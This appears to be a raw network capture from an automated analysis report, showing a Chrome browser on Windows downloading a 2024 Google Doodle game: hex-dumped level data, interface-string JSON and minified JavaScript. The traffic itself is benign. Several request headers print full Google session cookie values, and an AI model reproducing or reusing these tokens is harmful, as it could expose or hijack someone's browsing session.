2024-09-26 15:55:27 UTC	1390	IN	Data Raw: 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 Data Ascii: 111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
2024-09-26 15:55:27 UTC	1390	IN	Data Raw: 32 32 32 32 31 31 31 31 31 31 31 33 31 31 31 31 31 31 31 31 31 31 31 31 30 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 32 32 31 31 33 31 31 31 31 31 31 31 31 31 33 31 33 33 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 32 31 32 32 32 32 32 32 32 32 32 31 32 32 32 32 32 32 32 32 32 31 32 32 31 32 32 32 33 31 31 33 31 31 31 31 31 31 31 32 32 31 32 31 31 31 31 32 33 32 32 32 32 32 31 31 33 31 31 32 32 32 32 33 31 31 33 31 33 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 Data Ascii: 222211111113111111111111011111111111111111111111111111111111111111111111111111111111221131111111113133111111111111111111112122222222212222222221221222311311111112212111123222221131122223113131111111111111111111111111111111111111111111111111111111111111111
2024-09-26 15:55:27 UTC	1390	IN	Data Raw: 31 31 31 31 32 31 31 31 31 32 31 31 31 31 31 31 31 31 31 31 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 31 31 31 31 31 31 32 32 32 32 32 32 32 32 31 32 32 32 32 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 32 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 32 31 32 31 32 31 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 31 31 31 31 31 31 31 31 31 31 32 31 32 32 32 32 32 32 32 32 32 32 32 32 32 32 31 32 31 32 32 31 31 32 32 31 31 32 32 32 31 31 31 32 31 31 31 31 32 32 32 31 32 32 32 31 31 32 32 32 32 32 32 32 32 32 31 31 32 32 31 32 32 32 32 32 32 31 32 32 32 32 32 32 32 31 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 31 32 32 32 32 32 32 32 32 32 32 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 Data Ascii: 111121111211111111112222222222222222222211111122222222122221111111111111111111111111211111111111111111111212121121212121212121111111111121222222222222221212211221122211121111222122211222222222112212222221222222212222222222222222122222222221111111111111111
2024-09-26 15:55:27 UTC	1390	IN	Data Raw: 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 33 31 33 31 32 32 31 33 32 33 31 31 31 31 31 31 31 31 31 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 33 32 32 32 32 32 31 32 32 32 32 32 31 31 31 31 31 31 31 31 31 33 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 32 31 31 32 32 32 31 32 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 32 31 31 31 31 31 31 31 31 31 Data Ascii: 111111111111111111111111111111111111111111111111111111131312213231111111112222222222222222222222222222222222222222222222222222222222222222222222222232222212222211111111131111111111111111111111121122212111111111111111111111111111111111111111111112111111111
2024-09-26 15:55:27 UTC	1390	IN	Data Raw: 31 31 31 31 31 32 33 32 32 33 31 31 31 32 32 31 33 32 31 31 31 32 32 33 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 32 32 32 32 31 31 33 31 31 32 31 32 32 32 32 32 32 32 33 32 32 33 32 33 32 32 32 31 31 32 31 31 31 32 32 33 31 33 31 33 31 31 31 31 32 30 30 30 32 30 32 30 30 30 30 30 30 30 30 30 30 30 30 32 30 30 30 32 30 30 30 30 30 30 30 30 30 32 32 32 32 30 32 30 32 32 32 30 32 32 32 32 30 30 30 30 Data Ascii: 111112322311122132111223100000000000000000000000000000000000000000000200000000000000000000000000000000000000000001111111111111111111111111111111111111111111111222211311212222222322323222112111223131311112000202000000000000200020000000002222020222022220000
2024-09-26 15:55:27 UTC	339	IN	Data Raw: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 33 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 32 32 33 31 30 30 30 30 30 32 33 30 31 32 33 32 31 31 32 33 30 30 30 31 31 31 32 33 32 32 32 32 33 30 30 30 30 30 30 30 32 32 33 30 30 32 32 33 32 31 32 31 32 32 32 32 32 32 33 31 31 31 31 31 31 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 32 33 30 30 30 30 32 33 30 32 32 32 33 33 30 30 30 31 32 32 33 31 31 32 31 32 33 31 32 32 32 32 32 32 32 32 32 33 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 32 32 32 32 32 33 31 31 33 31 31 30 30 30 30 30 30 30 30 30 30 30 32 32 32 33 31 32 32 33 31 31 31 31 30 30 30 30 30 30 30 33 33 31 33 31 33 31 Data Ascii: 000000000000000000000000000011113111111111111111111111111111122310000023012321123000111232222300000002230022321212222223111111100000000000000022300002302223300012231121231222222222300000000000000000000000002222223113110000000000022231223111100000003313131

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.16	49735	172.217.16.132	443	6888	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:27 UTC	1321	OUT	GET /logos/2024/popcorn/rc4/messages.en.nocache.json HTTP/1.1 Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-prefers-color-scheme: light sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: / X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; NID=517=AmejulbRjs41gm5HAh0KNWIbESmYMNZ1axMfLtSSaMj3ipS3W-ZIczoXLjeaRFrsNlCKVipoFABp4RnsYthLAR_8X_MjQNiqFRyKiEcC7JOYrvXd8n41SO2Dq_friOqzZJv7SdIo1yrE5-GOgKAzqwIB7IqmX4e1csjhzX78XTAVb9Og_NFq0OtWtOB7198KZzuO
2024-09-26 15:55:27 UTC	710	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="doodle-eng" Report-To: {"group":"doodle-eng","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/doodle-eng"}]} Content-Length: 2687 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Thu, 26 Sep 2024 15:55:27 GMT Expires: Thu, 26 Sep 2024 15:56:27 GMT Cache-Control: public, max-age=60 Last-Modified: Wed, 25 Sep 2024 18:30:00 GMT Content-Type: application/json Vary: Accept-Encoding Age: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-09-26 15:55:27 UTC	680	IN	Data Raw: 29 5d 7d 27 0a 7b 22 62 61 63 6b 22 3a 22 42 61 63 6b 22 2c 22 62 75 74 74 6f 6e 5f 63 61 74 63 68 22 3a 22 43 61 74 63 68 22 2c 22 62 75 74 74 6f 6e 5f 68 65 61 6c 22 3a 22 48 65 61 6c 22 2c 22 62 75 74 74 6f 6e 5f 6d 61 69 6e 5f 6d 65 6e 75 22 3a 22 4d 61 69 6e 20 6d 65 6e 75 22 2c 22 62 75 74 74 6f 6e 5f 72 65 70 6c 61 79 22 3a 22 50 6c 61 79 20 61 67 61 69 6e 22 2c 22 62 75 74 74 6f 6e 5f 73 68 69 65 6c 64 22 3a 22 53 68 69 65 6c 64 22 2c 22 62 75 74 74 6f 6e 5f 74 68 72 6f 77 22 3a 22 54 68 72 6f 77 22 2c 22 63 68 61 72 61 63 74 65 72 5f 72 65 61 64 79 22 3a 22 52 65 61 64 79 21 22 2c 22 63 68 61 72 61 63 74 65 72 5f 73 65 6c 65 63 74 5f 63 61 74 63 68 22 3a 22 43 61 74 63 68 20 26 20 74 68 72 6f 77 22 2c 22 63 68 61 72 61 63 74 65 72 5f 73 65 6c 65 Data Ascii: )]}'{"back":"Back","button_catch":"Catch","button_heal":"Heal","button_main_menu":"Main menu","button_replay":"Play again","button_shield":"Shield","button_throw":"Throw","character_ready":"Ready!","character_select_catch":"Catch & throw","character_sele
2024-09-26 15:55:27 UTC	1390	IN	Data Raw: 61 79 65 72 73 22 3a 22 46 69 6e 64 69 6e 67 20 70 6c 61 79 65 72 73 22 2c 22 67 61 6d 65 5f 6f 76 65 72 22 3a 22 47 41 4d 45 21 22 2c 22 67 61 6d 65 5f 6f 76 65 72 5f 63 6f 6e 67 72 61 74 73 22 3a 22 43 6f 6e 67 72 61 74 73 21 22 2c 22 67 61 6d 65 5f 6f 76 65 72 5f 6c 61 73 74 5f 6b 65 72 6e 65 6c 22 3a 22 59 6f 75 27 72 65 20 74 68 65 20 6c 61 73 74 20 70 6c 61 79 65 72 20 73 74 61 6e 64 69 6e 67 22 2c 22 67 61 6d 65 5f 6f 76 65 72 5f 6c 61 73 74 5f 73 71 75 61 64 22 3a 22 59 6f 75 27 72 65 20 74 68 65 20 6c 61 73 74 20 73 71 75 61 64 20 73 74 61 6e 64 69 6e 67 22 2c 22 68 6f 77 5f 74 6f 5f 70 6c 61 79 22 3a 22 48 6f 77 20 74 6f 20 70 6c 61 79 22 2c 22 6c 65 76 65 6c 5f 63 6f 6d 70 6c 65 74 65 22 3a 22 4c 65 76 65 6c 20 63 6f 6d 70 6c 65 74 65 21 22 2c Data Ascii: ayers":"Finding players","game_over":"GAME!","game_over_congrats":"Congrats!","game_over_last_kernel":"You're the last player standing","game_over_last_squad":"You're the last squad standing","how_to_play":"How to play","level_complete":"Level complete!",
2024-09-26 15:55:27 UTC	617	IN	Data Raw: 20 74 68 65 20 6a 6f 79 73 74 69 63 6b 20 74 6f 20 6d 6f 76 65 20 74 6f 20 74 68 65 20 74 61 72 67 65 74 2e 22 2c 22 74 75 74 6f 72 69 61 6c 5f 73 6b 69 70 22 3a 22 53 6b 69 70 20 74 75 74 6f 72 69 61 6c 20 3e 22 2c 22 74 77 69 74 74 65 72 22 3a 22 58 22 2c 22 75 6e 6d 75 74 65 22 3a 22 55 6e 6d 75 74 65 22 2c 22 79 6f 75 5f 70 6f 70 70 65 64 22 3a 22 59 6f 75 20 70 6f 70 70 65 64 22 2c 22 79 6f 75 5f 70 6f 70 70 65 64 5f 73 71 75 61 64 22 3a 22 59 6f 75 72 20 73 71 75 61 64 20 70 6f 70 70 65 64 22 2c 22 79 6f 75 5f 70 6f 70 70 65 64 5f 73 71 75 61 64 5f 73 75 62 68 65 61 64 65 72 22 3a 22 59 6f 75 72 20 73 71 75 61 64 20 63 61 6e 20 72 65 76 69 76 65 20 79 6f 75 2e 22 2c 22 79 6f 75 72 5f 73 71 75 61 64 22 3a 22 59 6f 75 72 20 73 71 75 61 64 22 2c 22 6d Data Ascii: the joystick to move to the target.","tutorial_skip":"Skip tutorial >","twitter":"X","unmute":"Unmute","you_popped":"You popped","you_popped_squad":"Your squad popped","you_popped_squad_subheader":"Your squad can revive you.","your_squad":"Your squad","m

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.16	49736	142.250.186.132	443	6888	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:27 UTC	751	OUT	GET /logos/doodles/2024/popcorn/rc4/popcorn.js HTTP/1.1 Host: www.google.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw== Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; NID=517=AmejulbRjs41gm5HAh0KNWIbESmYMNZ1axMfLtSSaMj3ipS3W-ZIczoXLjeaRFrsNlCKVipoFABp4RnsYthLAR_8X_MjQNiqFRyKiEcC7JOYrvXd8n41SO2Dq_friOqzZJv7SdIo1yrE5-GOgKAzqwIB7IqmX4e1csjhzX78XTAVb9Og_NFq0OtWtOB7198KZzuO
2024-09-26 15:55:27 UTC	690	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="doodle-eng" Report-To: {"group":"doodle-eng","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/doodle-eng"}]} Content-Length: 1157821 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Thu, 26 Sep 2024 07:06:08 GMT Expires: Fri, 26 Sep 2025 07:06:08 GMT Cache-Control: public, max-age=31536000 Last-Modified: Wed, 25 Sep 2024 17:27:58 GMT Content-Type: text/javascript Vary: Accept-Encoding Age: 31759 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-09-26 15:55:27 UTC	700	IN	Data Raw: 28 66 75 6e 63 74 69 6f 6e 28 29 7b 27 75 73 65 20 73 74 72 69 63 74 27 3b 76 61 72 20 6d 2c 61 61 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 61 3d 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 7c 7c 61 3d 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 29 72 65 74 75 72 6e 20 61 3b 61 5b 62 5d 3d 63 2e 76 61 6c 75 65 3b 72 65 74 75 72 6e 20 61 7d 3b 66 75 6e 63 74 69 6f 6e 20 62 61 28 61 29 7b 61 3d 5b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2c 61 2c 22 6f 62 6a 65 Data Ascii: (function(){'use strict';var m,aa=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};function ba(a){a=["object"==typeof globalThis&&globalThis,a,"obje
2024-09-26 15:55:27 UTC	1390	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 63 28 64 29 7b 72 65 74 75 72 6e 20 61 2e 74 68 72 6f 77 28 64 29 7d 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 64 2c 65 29 7b 66 75 6e 63 74 69 6f 6e 20 66 28 67 29 7b 67 2e 64 6f 6e 65 3f 64 28 67 2e 76 61 6c 75 65 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 67 2e 76 61 6c 75 65 29 2e 74 68 65 6e 28 62 2c 63 29 2e 74 68 65 6e 28 66 2c 65 29 7d 66 28 61 2e 6e 65 78 74 28 29 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 71 28 61 29 7b 72 65 74 75 72 6e 20 66 61 28 61 28 29 29 7d 65 61 28 22 53 79 6d 62 6f 6c 2e 64 69 73 70 6f 73 65 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 53 79 6d 62 6f 6c 28 22 53 79 6d 62 6f 6c 2e 64 69 73 70 6f 73 65 22 29 7d 29 Data Ascii: }function c(d){return a.throw(d)}return new Promise(function(d,e){function f(g){g.done?d(g.value):Promise.resolve(g.value).then(b,c).then(f,e)}f(a.next())})}function q(a){return fa(a())}ea("Symbol.dispose",function(a){return a?a:Symbol("Symbol.dispose")})
2024-09-26 15:55:27 UTC	1390	IN	Data Raw: 6f 74 6f 74 79 70 65 2e 66 6c 61 74 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 29 7b 62 3d 62 3d 3d 3d 76 6f 69 64 20 30 3f 31 3a 62 3b 76 61 72 20 63 3d 5b 5d 3b 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 66 6f 72 45 61 63 68 2e 63 61 6c 6c 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 64 29 7b 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 64 29 26 26 62 3e 30 3f 28 64 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 66 6c 61 74 2e 63 61 6c 6c 28 64 2c 62 2d 31 29 2c 63 2e 70 75 73 68 2e 61 70 70 6c 79 28 63 2c 64 29 29 3a 63 2e 70 75 73 68 28 64 29 7d 29 3b 72 65 74 75 72 6e 20 63 7d 7d 29 3b 2f 2a 0a 0a 20 43 6f 70 79 72 69 67 68 74 20 54 68 65 20 43 6c 6f 73 75 72 65 20 4c 69 62 72 61 72 Data Ascii: ototype.flat",function(a){return a?a:function(b){b=b===void 0?1:b;var c=[];Array.prototype.forEach.call(this,function(d){Array.isArray(d)&&b>0?(d=Array.prototype.flat.call(d,b-1),c.push.apply(c,d)):c.push(d)});return c}});/* Copyright The Closure Librar
2024-09-26 15:55:27 UTC	1390	IN	Data Raw: 7c 7c 62 3d 3d 3d 76 6f 69 64 20 30 3f 63 5b 64 5d 26 26 63 5b 64 5d 21 3d 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 5b 64 5d 3f 63 3d 63 5b 64 5d 3a 63 3d 63 5b 64 5d 3d 7b 7d 3a 63 5b 64 5d 3d 62 7d 66 75 6e 63 74 69 6f 6e 20 74 61 28 61 2c 62 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 7d 63 2e 70 72 6f 74 6f 74 79 70 65 3d 62 2e 70 72 6f 74 6f 74 79 70 65 3b 61 2e 4e 62 3d 62 2e 70 72 6f 74 6f 74 79 70 65 3b 61 2e 70 72 6f 74 6f 74 79 70 65 3d 6e 65 77 20 63 3b 61 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 61 3b 61 2e 58 6b 3d 66 75 6e 63 74 69 6f 6e 28 64 2c 65 2c 66 29 7b 66 6f 72 28 76 61 72 20 67 3d 41 72 72 61 79 28 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2d 32 29 2c 68 3d 32 3b 68 3c 61 72 67 75 6d 65 Data Ascii: \|\|b===void 0?c[d]&&c[d]!==Object.prototype[d]?c=c[d]:c=c[d]={}:c[d]=b}function ta(a,b){function c(){}c.prototype=b.prototype;a.Nb=b.prototype;a.prototype=new c;a.prototype.constructor=a;a.Xk=function(d,e,f){for(var g=Array(arguments.length-2),h=2;h<argume
2024-09-26 15:55:27 UTC	1390	IN	Data Raw: 28 62 3d 62 2e 75 73 65 72 41 67 65 6e 74 29 62 72 65 61 6b 20 61 3b 62 3d 22 22 7d 72 65 74 75 72 6e 20 62 2e 69 6e 64 65 78 4f 66 28 61 29 21 3d 2d 31 7d 3b 66 75 6e 63 74 69 6f 6e 20 4d 61 28 29 7b 72 65 74 75 72 6e 20 46 61 3f 21 21 49 61 26 26 49 61 2e 62 72 61 6e 64 73 2e 6c 65 6e 67 74 68 3e 30 3a 21 31 7d 66 75 6e 63 74 69 6f 6e 20 4e 61 28 29 7b 72 65 74 75 72 6e 20 4d 61 28 29 3f 4b 61 28 22 43 68 72 6f 6d 69 75 6d 22 29 3a 28 4c 61 28 22 43 68 72 6f 6d 65 22 29 7c 7c 4c 61 28 22 43 72 69 4f 53 22 29 29 26 26 21 28 4d 61 28 29 3f 30 3a 4c 61 28 22 45 64 67 65 22 29 29 7c 7c 4c 61 28 22 53 69 6c 6b 22 29 7d 3b 63 6f 6e 73 74 20 4f 61 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 69 6e 64 65 78 4f 66 3f 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 Data Ascii: (b=b.userAgent)break a;b=""}return b.indexOf(a)!=-1};function Ma(){return Fa?!!Ia&&Ia.brands.length>0:!1}function Na(){return Ma()?Ka("Chromium"):(La("Chrome")\|\|La("CriOS"))&&!(Ma()?0:La("Edge"))\|\|La("Silk")};const Oa=Array.prototype.indexOf?function(a,b)
2024-09-26 15:55:27 UTC	1390	IN	Data Raw: 6f 72 28 3b 64 3c 61 2e 6c 65 6e 67 74 68 3b 29 7b 76 61 72 20 6c 3d 61 2e 63 68 61 72 41 74 28 64 2b 2b 29 2c 6e 3d 53 61 5b 6c 5d 3b 69 66 28 6e 21 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 20 6e 3b 69 66 28 21 2f 5e 5b 5c 73 5c 78 61 30 5d 2a 24 2f 2e 74 65 73 74 28 6c 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 65 60 22 2b 6c 29 3b 7d 72 65 74 75 72 6e 20 6b 7d 55 61 28 29 3b 66 6f 72 28 76 61 72 20 64 3d 30 3b 3b 29 7b 76 61 72 20 65 3d 63 28 2d 31 29 2c 66 3d 63 28 30 29 2c 67 3d 63 28 36 34 29 2c 68 3d 63 28 36 34 29 3b 69 66 28 68 3d 3d 3d 36 34 26 26 65 3d 3d 3d 2d 31 29 62 72 65 61 6b 3b 62 28 65 3c 3c 32 7c 66 3e 3e 34 29 3b 67 21 3d 36 34 26 26 28 62 28 66 3c 3c 34 26 32 34 30 7c 67 3e 3e 32 29 2c 68 21 3d 36 34 26 26 62 28 67 3c 3c 36 26 31 39 32 Data Ascii: or(;d<a.length;){var l=a.charAt(d++),n=Sa[l];if(n!=null)return n;if(!/^[\s\xa0]*$/.test(l))throw Error("e`"+l);}return k}Ua();for(var d=0;;){var e=c(-1),f=c(0),g=c(64),h=c(64);if(h===64&&e===-1)break;b(e<<2\|f>>4);g!=64&&(b(f<<4&240\|g>>2),h!=64&&b(g<<6&192
2024-09-26 15:55:27 UTC	1390	IN	Data Raw: 3d 3d 3d 30 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 67 22 29 3b 7d 7d 3b 66 75 6e 63 74 69 6f 6e 20 6a 62 28 61 2c 62 29 7b 61 2e 5f 5f 63 6c 6f 73 75 72 65 5f 5f 65 72 72 6f 72 5f 5f 63 6f 6e 74 65 78 74 5f 5f 39 38 34 33 38 32 7c 7c 28 61 2e 5f 5f 63 6c 6f 73 75 72 65 5f 5f 65 72 72 6f 72 5f 5f 63 6f 6e 74 65 78 74 5f 5f 39 38 34 33 38 32 3d 7b 7d 29 3b 61 2e 5f 5f 63 6c 6f 73 75 72 65 5f 5f 65 72 72 6f 72 5f 5f 63 6f 6e 74 65 78 74 5f 5f 39 38 34 33 38 32 2e 73 65 76 65 72 69 74 79 3d 62 7d 3b 6c 65 74 20 6b 62 3b 66 75 6e 63 74 69 6f 6e 20 6c 62 28 29 7b 63 6f 6e 73 74 20 61 3d 45 72 72 6f 72 28 29 3b 6a 62 28 61 2c 22 69 6e 63 69 64 65 6e 74 22 29 3b 45 61 28 61 29 7d 66 75 6e 63 74 69 6f 6e 20 6d 62 28 61 29 7b 61 3d 45 72 72 6f 72 28 61 29 3b 6a Data Ascii: ===0)throw Error("g");}};function jb(a,b){a.__closure__error__context__984382\|\|(a.__closure__error__context__984382={});a.__closure__error__context__984382.severity=b};let kb;function lb(){const a=Error();jb(a,"incident");Ea(a)}function mb(a){a=Error(a);j
2024-09-26 15:55:27 UTC	1390	IN	Data Raw: 76 6f 69 64 20 30 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 47 62 28 61 29 7b 72 65 74 75 72 6e 21 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 61 29 7c 7c 61 2e 6c 65 6e 67 74 68 3f 21 31 3a 77 62 28 61 29 26 31 3f 21 30 3a 21 31 7d 76 61 72 20 48 62 3b 63 6f 6e 73 74 20 49 62 3d 5b 5d 3b 79 62 28 49 62 2c 35 35 29 3b 48 62 3d 4f 62 6a 65 63 74 2e 66 72 65 65 7a 65 28 49 62 29 3b 0a 66 75 6e 63 74 69 6f 6e 20 4a 62 28 61 29 7b 69 66 28 61 26 32 29 74 68 72 6f 77 20 45 72 72 6f 72 28 29 3b 7d 6c 65 74 20 4b 62 3b 66 75 6e 63 74 69 6f 6e 20 4c 62 28 61 2c 62 29 7b 28 62 3d 4b 62 3f 62 5b 4b 62 5d 3a 76 6f 69 64 20 30 29 26 26 28 61 5b 4b 62 5d 3d 6f 62 28 62 29 29 7d 76 61 72 20 4d 62 3d 4f 62 6a 65 63 74 2e 66 72 65 65 7a 65 28 7b 7d 29 3b 4f Data Ascii: void 0}return a}function Gb(a){return!Array.isArray(a)\|\|a.length?!1:wb(a)&1?!0:!1}var Hb;const Ib=[];yb(Ib,55);Hb=Object.freeze(Ib);function Jb(a){if(a&2)throw Error();}let Kb;function Lb(a,b){(b=Kb?b[Kb]:void 0)&&(a[Kb]=ob(b))}var Mb=Object.freeze({});O
